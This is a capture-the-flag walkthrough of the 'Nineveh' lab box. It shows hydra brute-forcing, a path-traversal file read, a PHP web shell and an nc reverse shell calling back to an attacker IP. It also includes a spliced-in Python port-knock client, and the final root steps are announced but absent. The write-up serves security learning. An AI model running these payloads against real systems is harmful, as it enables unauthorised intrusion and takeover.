NINEVEH

Burak Dirlik


Let's start enumeration with nmap, as always. The target machine is 10.129.132.70 and the nmap command is:

nmap -sC -sV -oN nmap.txt 10.129.132.70

Nothing comes up in the browser when we visit the IP directly, so we need to update the /etc/hosts file.

We added the line 10.129.132.70 nineveh.htb to it.

Now we just see a placeholder page saying that it works.

Let's do some directory fuzzing:

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://nineveh.htb -t 15

We got /department and /server-status directories.

The /department directory redirects to login.php, so now we have an attack surface: SQL injection and brute force are both options. I chose brute force with hydra.

The page source mentions admin and amrois; maybe one of them is a valid username. Let's try.

Trying admin with a random password gives “Invalid Password”, while amrois gives a different error, so admin is a valid username and amrois is not. The login form leaks this through its different error messages for valid and invalid users.

Brute force the password for the admin username:

hydra -l 'admin' -P /usr/share/wordlists/rockyou.txt nineveh.htb http-post-form '/department/login.php:username=^USER^&password=^PASS^&Login=Login:Invalid Password'

We get the password, and after logging in there is a note at the end of the page.

The website runs PHP and exposes an info.php file, but it is not useful.

Since the URL is reading a file by name, I decided to try LFI.

After some trials, the following URL works. Note that the expected notes path is kept at the front and the ../ traversal is appended after it:

nineveh.htb/department/manage.php?notes=files/ninevehNotes.txt/../../../etc/passwd

The site's TLS certificate gives a hint for the other login; we note admin@nineveh.htb.

Another brute force attack with hydra gives us that password as well.

After logging in we see a running database admin page, phpLiteAdmin.

There is a known RCE in phpLiteAdmin; let's try it.

I opened the exploit to examine it.

We need to apply what the exploit describes:

Create a database named hack.php.

Create a new table, put <?php echo system($_REQUEST["cmd"]); ?> in it, then save.

Include the planted database file through the LFI, put the reverse shell in the cmd parameter of the URL, and start a netcat listener on the port it calls back to (3333 here).

(The reverse shell command is URL-encoded.)

nineveh.htb/department/manage.php?notes=/ninevehNotes/../var/tmp/hack.php&cmd=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2%3E%261|nc+10.10.14.42+3333+%3E/tmp/f

Visiting this URL in the browser drops the shell to the listener.

Browsing around the directories, I see a nineveh.png file.

This file contains a private key; I check it with:

strings -n 20 nineveh.png

The command binwalk -Me nineveh.png --run-as=root does the following:

  1. Scans the file nineveh.png for embedded files or file systems.
  2. Extracts any embedded files or file systems it finds.
  3. Recursively scans any extracted files for further embedded content.
  4. Runs the external extraction utilities as root; recent binwalk versions refuse to extract while running as root unless this is given explicitly.

After extraction we have an RSA private key, which we can use for an SSH connection.

After a few attempts I couldn't connect, so I watched IppSec's solution, where he talks about port knocking. We have obtained two files: nineveh.priv and nineveh.pub. When I find private keys, the first thing I try is to SSH into the user's account with them. However, as you may recall, nmap did not show an open SSH port. This leads us to a finding from our enumeration that we had not yet explored.

While running LinEnum, it showed port 22 listening on localhost, even though nmap did not report this port as open.

This suggests port knocking, a method of opening ports on a firewall externally by attempting connections to a series of predetermined closed ports. When the correct sequence of connection attempts is seen, the firewall rules are dynamically adjusted to let the host that made them connect to the protected port(s).

In essence, if you know the exact sequence of ports, you can open port 22. To find the sequence we enumerate files on the server through the shell we already have; the file we need is the knockd configuration (/etc/knockd.conf by default).

openSSH port sequence: 571, 290, 911

for x in 571 290 911; do nmap -Pn --max-retries 0 -p $x 10.10.10.43 && sleep 1; done
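The nmap loop above is enough to knock; as an added example that is not part of the original post, here is a small Python knock client that reads the sequence out of a knockd-style config, replays it as plain TCP connect attempts (a closed port refuses the connection, but the SYN that knockd sniffs is still sent), and then checks whether port 22 has opened. The config text is constructed from the sequence the writeup found; the closeSSH section, timeouts and iptables commands are typical knockd settings and are assumptions of this example, not the file from the box.

```python
"""Port-knock client: read the sequence from a knockd config and replay it.

Added example, not from the original post. SAMPLE_KNOCKD_CONF is
constructed around the sequence found in the writeup (571, 290, 911);
everything else in it is an assumed, typical knockd configuration.
"""
import re
import socket
import time

# Constructed knockd.conf-style text (not the file from the target).
SAMPLE_KNOCKD_CONF = """\
[options]
    logfile = /var/log/knockd.log

[openSSH]
    sequence    = 571,290,911
    seq_timeout = 5
    command     = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
    tcpflags    = syn

[closeSSH]
    sequence    = 911,290,571
    seq_timeout = 5
    command     = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
    tcpflags    = syn
"""


def parse_sequence(conf_text, section="openSSH"):
    """Return the knock ports (ints) from the given [section].

    knockd also accepts entries like 571:tcp or 290:udp; the protocol
    suffix is dropped here because the client below only sends TCP SYNs.
    """
    current = None
    for raw in conf_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = re.fullmatch(r"\[(.+)\]", line)
        if m:
            current = m.group(1)
            continue
        if current == section:
            m = re.fullmatch(r"sequence\s*=\s*(.+)", line)
            if m:
                return [int(p.strip().split(":")[0]) for p in m.group(1).split(",")]
    raise ValueError(f"no sequence in section [{section}]")


def tcp_syn(host, port, timeout=0.5):
    """One knock: a connect attempt. The port is closed, so the connect
    fails, but the SYN that knockd is watching for has been sent."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        try:
            s.connect((host, port))
        except OSError:
            pass


def knock(host, ports, delay=1.0, send=tcp_syn, pause=time.sleep):
    """Knock each port in order with a pause between knocks; the whole
    sequence must still fit inside knockd's seq_timeout. Returns the
    ports knocked, in order, so the sequence can be verified."""
    done = []
    for port in ports:
        send(host, port)
        done.append(port)
        pause(delay)
    return done


def port_open(host, port=22, timeout=2.0):
    """Check whether the protected port now accepts connections."""
    try:
        socket.create_connection((host, port), timeout=timeout).close()
        return True
    except OSError:
        return False


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "10.10.10.43"
    seq = parse_sequence(SAMPLE_KNOCKD_CONF)
    print("knocked:", knock(target, seq))
    print("ssh open" if port_open(target) else "ssh still closed")
```

Once port_open() reports the port as open, connect with the extracted key (ssh -i nineveh.priv) from the same source address, because the knockd rule only admits the host that knocked.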

I found user.txt, and now we need to escalate privileges to read root.txt. Let's enumerate with LinEnum.sh; I start an HTTP server to transfer it.

That didn't give anything useful, so I used pspy to enumerate running processes instead.

On Kali, in the tmp directory:

wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64s
python3 -m http.server 7777

In the target shell:

wget 10.10.14.3:7777/pspy64s
chmod +x pspy64s
./pspy64s

An interesting process pops up: chkrootkit.

After a little searching, we find a privilege escalation vulnerability related to it.

The steps to become the root user are below:

And finally we are root.
